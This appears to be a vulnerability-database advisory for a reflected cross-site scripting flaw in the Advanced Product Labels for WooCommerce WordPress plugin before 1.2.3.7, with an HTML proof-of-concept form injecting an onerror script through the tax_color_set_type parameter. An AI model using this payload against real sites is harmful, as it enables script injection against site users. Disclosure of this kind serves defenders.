WordPress Plugin Vulnerabilities
Advanced Product Labels for WooCommerce < 1.2.3.7 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action's response, leading to a Reflected Cross-Site Scripting
Proof of Concept
As any authenticated user: <html> <form action="https://example.com/wp-admin/admin-ajax.php?action=berocket_apl_color_listener" method="POST"> <input type="text" value='"><img src onerror=alert(/XSS/)>' name="tax_color_set_type"> <input type="submit" value="Send"> </form> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-15 (about 2 years ago)
Added
2022-02-15 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)